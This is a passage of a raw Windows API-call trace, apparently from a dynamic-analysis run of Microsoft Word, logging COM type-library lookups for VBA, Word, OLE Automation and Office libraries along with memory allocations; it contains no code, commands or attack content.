ppTypeComp=0xffff000100000000, pDummy=0x0 | out: ppTInfo=0x33e4fb6a38*=0x1d39d552bc8, pDescKind=0x33e4fb6a4c*=1, ppFuncDesc=0x33e4fb6a50, ppVarDesc=0x1d38cdd0cc0, ppTypeComp=0xffff000100000000, pDummy=0x0) returned 0x0 [0060.315] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6a40, pDummy=0x1d39d94adb8 | out: ppTypeAttr=0x33e4fb6a40, pDummy=0x1d39d94adb8*=0x0) returned 0x0 [0060.315] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.315] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb68a0 | out: ppvObject=0x33e4fb68a0*=0x1d39d552bc8) returned 0x0 [0060.315] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d552bc8, memid=5, invkind=1, pFuncIndex=0x33e4fb68e0 | out: pFuncIndex=0x33e4fb68e0*=0x1) returned 0x0 [0060.315] ITypeInfo2:GetFuncCustData (in: This=0x1d39d552bc8, index=0x1, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb68f8 | out: pVarVal=0x33e4fb68f8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ffc, wReserved3=0x0, varVal1=0x33e4fb69a0, varVal2=0x1d39da83580)) returned 0x0 [0060.315] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.315] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x8 [0060.315] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.315] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.315] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6af8 | out: ppvObject=0x33e4fb6af8*=0x0) returned 0x80004002 [0060.315] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x8 [0060.315] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.315] CoCreateGuid (in: pguid=0x33e4fb6f30 | out: pguid=0x33e4fb6f30*(Data1=0x34c9e61b, Data2=0x2de5, Data3=0x4583, Data4=([0]=0x9e, [1]=0xb0, [2]=0x96, [3]=0x2e, [4]=0x5f, [5]=0x2, [6]=0xb7, [7]=0x64))) returned 0x0 [0060.315] CoCreateGuid (in: pguid=0x33e4fb6f30 | out: pguid=0x33e4fb6f30*(Data1=0x2f69cb7, Data2=0x72f, Data3=0x4af3, Data4=([0]=0x86, [1]=0xbb, [2]=0x67, [3]=0x76, [4]=0x35, [5]=0xd, [6]=0xf2, [7]=0x82))) returned 0x0 [0060.315] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x14) returned 0x1d39dbb34b0 [0060.315] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.316] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7068 | out: ppvObject=0x33e4fb7068*=0x0) returned 0x80004002 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d826e30 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da81000 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da82680 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8af6b0 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b01f0 [0060.316] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7068 | out: ppvObject=0x33e4fb7068*=0x0) returned 0x80004002 [0060.316] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x60) returned 0x1d39d848840 [0060.316] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0060.316] IUnknown:AddRef (This=0x1d3980663b0) returned 0x7 [0060.316] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb6598, pDummy=0x0 | out: ppTLibAttr=0x33e4fb6598, pDummy=0x0) returned 0x0 [0060.316] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb65b0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.316] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc0110 [0060.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x33e4fb6620, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLLí\x8cÓ\x01", lpUsedDefaultChar=0x0) returned 66 [0060.316] strcpy_s (in: _Dst=0x1d3984c9c28, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0060.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x33e4fb6730, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0060.316] strcpy_s (in: _Dst=0x1d3984c9c78, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0060.316] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc1af0 [0060.316] IUnknown:AddRef (This=0x1d3980663b0) returned 0x8 [0060.316] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.316] IUnknown:Release (This=0x1d3980663b0) returned 0x7 [0060.316] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0060.317] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0060.317] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x13 [0060.317] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb6598, pDummy=0x0 | out: ppTLibAttr=0x33e4fb6598, pDummy=0x0) returned 0x0 [0060.317] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb65b0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x33e4fb6620, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0060.317] strcpy_s (in: _Dst=0x1d3984c9ce8, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0060.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb6730, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0060.317] strcpy_s (in: _Dst=0x1d3984c9d30, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0060.317] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b0430 [0060.317] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x14 [0060.317] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0060.317] IUnknown:Release (This=0x1d3985c4c00) returned 0x13 [0060.317] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0060.317] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0060.318] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0 [0060.318] IUnknown:AddRef (This=0x1d3980655f0) returned 0x9 [0060.318] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980655f0, ppTLibAttr=0x33e4fb6598, pDummy=0x0 | out: ppTLibAttr=0x33e4fb6598, pDummy=0x0) returned 0x0 [0060.318] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb65b0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x33e4fb6620, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0060.318] strcpy_s (in: _Dst=0x1d39d8b04b8, _DstSize=0x20, _Src="C:\\Windows\\System32\\stdole2.tlb" | out: _Dst="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0060.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x33e4fb6730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0060.318] strcpy_s (in: _Dst=0x1d39d8b04e0, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0060.318] IUnknown:AddRef (This=0x1d3980655f0) returned 0xa [0060.318] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980655f0) returned 0x0 [0060.318] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0060.319] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x20) returned 0x1d38f2abc90 [0060.319] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0060.319] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0060.320] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 2 [0060.320] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CNormal") returned 4 [0060.320] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0060.320] IUnknown:AddRef (This=0x1d3985c5700) returned 0x6 [0060.320] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c5700, ppTLibAttr=0x33e4fb6598, pDummy=0x0 | out: ppTLibAttr=0x33e4fb6598, pDummy=0x0) returned 0x0 [0060.320] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0xe4fb65b0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d38cdd0000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d38cdd0000*=0x0) returned 0x0 [0060.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x33e4fb6620, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0060.320] strcpy_s (in: _Dst=0x1d39d8b0550, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0060.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x33e4fb6730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0060.320] strcpy_s (in: _Dst=0x1d39d8b0598, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0060.320] IUnknown:AddRef (This=0x1d3985c5700) returned 0x7 [0060.320] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c5700) returned 0x0 [0060.320] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0060.320] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7f40) [0060.320] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb61f8, pDummy=0x1d39d8e74c0 | out: ppTypeAttr=0x33e4fb61f8, pDummy=0x1d39d8e74c0*=0x7) returned 0x0 [0060.320] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.320] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.321] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x118) returned 0x1d39d8fe7a0 [0060.321] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xe38) returned 0x1d39dc24030 [0060.322] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb61d8, pDummy=0x33e4fb6214 | out: ppTypeAttr=0x33e4fb61d8, pDummy=0x33e4fb6214*=0xffffffff) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x0, ppFuncDesc=0x33e4fb61d0, pDummy=0x1d38ee9d7a0 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x1d38ee9d7a0*=0x98ff3f0) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x1, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x2, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x3, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x4, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x5, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x6, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x7, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x8, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x9, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xa, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xb, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xc, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb61d8, pDummy=0x33e4fb6214 | out: ppTypeAttr=0x33e4fb61d8, pDummy=0x33e4fb6214*=0xffffffff) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x0, ppFuncDesc=0x33e4fb61d0, pDummy=0x1d38ee9d7a0 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x1d38ee9d7a0*=0x98ff3f0) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x1, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x2, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x3, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x4, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.322] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x5, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x6, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x7, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x8, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x9, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xa, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xb, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xc, ppFuncDesc=0x33e4fb61d0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb61d0, pDummy=0x6) returned 0x0 [0060.323] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.323] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.323] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39dbb3d10 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39dbb3d50 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39dbb3c70 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39dbb3f10 [0060.323] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5ae8 | out: ppvObject=0x33e4fb5ae8*=0x0) returned 0x80004002 [0060.323] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5ae0, pDummy=0x33e4fb5ae8 | out: ppTypeAttr=0x33e4fb5ae0, pDummy=0x33e4fb5ae8*=0x0) returned 0x0 [0060.323] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5a58 | out: ppvObject=0x33e4fb5a58*=0x0) returned 0x80004002 [0060.323] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x8 [0060.323] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5a50, pDummy=0x33e4fb5a58 | out: ppTypeAttr=0x33e4fb5a50, pDummy=0x33e4fb5a58*=0x0) returned 0x0 [0060.323] ITypeInfo:LocalReleaseTypeAttr 